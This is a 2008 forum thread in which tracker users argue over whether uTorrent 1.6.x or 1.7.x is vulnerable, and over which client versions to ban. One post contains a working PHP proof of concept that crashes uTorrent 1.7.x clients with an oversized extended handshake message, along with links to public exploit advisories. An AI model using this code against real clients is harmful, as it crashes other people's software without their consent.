Join Forces Against Utorrent 1.7.6

**stoi** · 01-21-2008, 12:25 AM

Originally Posted by Forumas

Originally Posted by stoi

actually BCG hasnt banned it yet, and we are still discussing it, we havnt actually banned 1.7.5 either but i think thats going to be a definitive later, but as for 1.6.# we dont know what we are going to do, that many different stories atm.

Im sure you will find out in a few hours if we have/havnt banned the 1.6.# versions.

then why we have recived announcements that is banned?

there are not many stories at all,u have read all from utorrent forum then u should know very well what to do and what other sites have done..just ban that bugy 161 for our safety

my reply was to that post not yours mate.

**JROQuinn** · 01-21-2008, 12:30 AM

ah ok, I tend to pass up some things if they dont seem as much of a big deal to me as others.

**rvt** · 01-21-2008, 12:41 AM

@Forumas

There was a bug in 1.6.0 that involved a malformed announce URL in a torrent file.
It was never going to affect any private torrent site that uses passkeys.
Even so, it was fixed in 1.6.1, which is the version a lot of people were using.

If you can back up your claims, feel free to do so, until then here's some reading:

POC for 1.6.0: http://milw0rm.com/exploits/3296

1.6.1 release: http://forum.utorrent.com/viewtopic.php?id=19865
- Fix: Fix malformed .torrent exploit

The latest exploit: http://aluigi.altervista.org/adv/ruttorrent-adv.txt

Some php code to test uT versions yourself. Change ip/port/hash, flip to ut and open the peers tab, then do anything else to make it crash.
1.6.x versions will not crash, 1.7.x versions will.

Code:

<?php

$ip='127.0.0.1';
$port=12345;
$hash='0123456789012345678901234567890123456789';
$hash=pack('H*',$hash);
$sock=fsockopen($ip,$port,$errno,$errstr,5);
if(!$sock) die('Dead');
fputs($sock,chr(19).'BitTorrent protocol'.chr(0).chr(0).chr(0).chr(0).chr(0).chr(16).chr(0).chr(0).$hash.'-AZ5000-123456789012');
$message='d1:ei0e1:mde1:v15000:';
for($i=0;$i<1500;$i++) $message.='0123456789';
$message.='e';
$num=pack('N',strlen($message)+2);
fputs($sock,$num.chr(20).chr(0).$message);
sleep(20);

?>

Also, can you name one exploit for 1.6.1 that's listed in any of the security databases?
1.7.x may have some bug fixes in them, but claiming they are more secure is just BS unless you can prove there are more exploits for 1.6.1 than for 1.7.x.

Finally:

( Firon ) tbh, I'd rather have people believe it affects it
( Firon ) but yeah, if you really wanna know, 1.6.x isn't affected but the others are.

From the horses mouth.

Maybe the php code above will meet the "burden of proof" demanded by ut fanbois in their forums, now everyone can test ut 1.7.x to destruction

**pro267** · 01-21-2008, 01:28 AM

Originally Posted by Forumas

lol that is old news,also they have allowed 161 becuase its is allowed on waffles,lol they cant check so they need to see from other sites,but that will nothing change since 161 and all version except 176 are banned from BCG,TTi,ScT,NB and many more..

Originally Posted by Forumas

there are not many stories at all,u have read all from utorrent forum then u should know very well what to do and what other sites have done..just ban that bugy 161 for our safety

Originally Posted by Forumas

there is a bug in 16x and that have been confirmed many times by different sites also not just some of the utorrent team..

Originally Posted by Forumas

sooner ot later 161 will be banned anyway from trackers since 161 is pretty old anyway and new version are simple better and secure than old 161..

You keep saying 1.6.1 is buggy and unsecure but present no actual proof. If you don't have proof then please refrain from spreading rumors. Relying on sites banning utorrent v1.6.1 does not constitute as proof.

Oh, and one more piece of advice, Forumas: you should really try to refrain from getting into arguments with rvt on these matters, unless you really know what you're talking about. Perhaps you don't know who he is but I can assure you that the man knows his shit.

**rvt** · 01-21-2008, 01:34 AM

Yep, that's my shit, it's big and brown

**fOrUmAs** · 01-21-2008, 01:35 AM

Originally Posted by rvt

If you can back up your claims, feel free to do so

lol i havent ban 161 owners did and i believe them,proofs are at utorrentforum also

1.6.x versions will not crash, 1.7.x versions will.

that is why every version except 176 are bugy even 175 but not 176 lol

Finally:

( Firon ) tbh, I'd rather have people believe it affects it
( Firon ) but yeah, if you really wanna know, 1.6.x isn't affected but the others are.

From the horses mouth.

yea that is very funny,he was talking something else few days ago and now this,i dont believe in this much or him anyway

aslo Firon is member on ScT and on few more trackers,so if he said that then we can all use again 161 then it will be probably unbanned..but since he havent said anything yet on ScT then i cant tell more..

also they have probably talk to Firon before they have decided to ban..

**grimms** · 01-21-2008, 01:39 AM

Originally Posted by stoi

the announement was sent out when 1.6.# was effected, every tracker was banning it, we held off though but made the announcement that we would be banning it.

new info has come out since then that 1.6.# is NOT effected by this.

other trackers banned and now allow it.

we didnt ban it but sent an announcement that we would, are we not allowed to change our minds even though other trackers have.

Announcement on BCG

Since the exploit we were concerned about does not affect uTorrent 1.6 and 1.6.1, those clients will still be allowed.

The only version of uTorrent in the 1.7 series that is allowed now is 1.7.6. This change is in effect already.

-Staff

Thanks for clearing that up stoi. I hate change but did upgrade to 1.7.6 due to most trackers banning 1.6.1. In the end (even after me making my own big deal about it) it really won't matter. If uTorrent says something like this, we must follow it, until theres good enough proof otherwise.

**rvt** · 01-21-2008, 01:59 AM

Originally Posted by Forumas

yea that is very funny,he was talking something else few days ago and now this,i dont believe in this much or him anyway

aslo Firon is member on ScT and on few more trackers,so if he said that then we can all use again 161 then it will be probably unbanned..but since he havent said anything yet on ScT then i cant tell more..

As well as being a tracker admin, Firon is also a paid employee of bittorrent inc.
Hardly impartial.

If you don't believe that one, then how about this one from someone who actually codes for uT/BT:

Originally Posted by Ryan Norton

Oh geez, this thing still. Listen, I already posted in the thread that the exploit didn't effect 1.6 line.

Originally Posted by Forumas

lol i havent ban 161 owners did and i believe them,proofs are at utorrentforum also

Nope, they aren't. Feel free to go search them. "1.6.1 exploit" brings up the exploit for 1.6.0. There is no exploit for 1.6.1.

Originally Posted by Forumas

that is why every version except 176 are bugy even 175 but not 176 lol

Yes, I know, I actually tested them all.
The point was that 1.6.x is not at all susceptible to the exploit firon claims it is susceptible to, and neither is it susceptible to the exploit for 1.6.0.
All 1.7.x up to 1.7.5 are, and therefore have more security issues than 1.6.1

Originally Posted by grimms

until theres good enough proof otherwise.

You can run the php code I posted yourself for proof. Or download the precompiled exploit from the link I gave. Or take the word of a uT/BT developer when he says 1.6.x is not affected. Or the retraction by the guy who initially linked 1.6 into this whole thing. Or the attempted retraction in the changelog and ut forums, http://forum.utorrent.com/viewtopic....299956#p299956

I could make a video I suppose, but videos can be edited. If you run the code and see it with your own eyes, then it must be proof.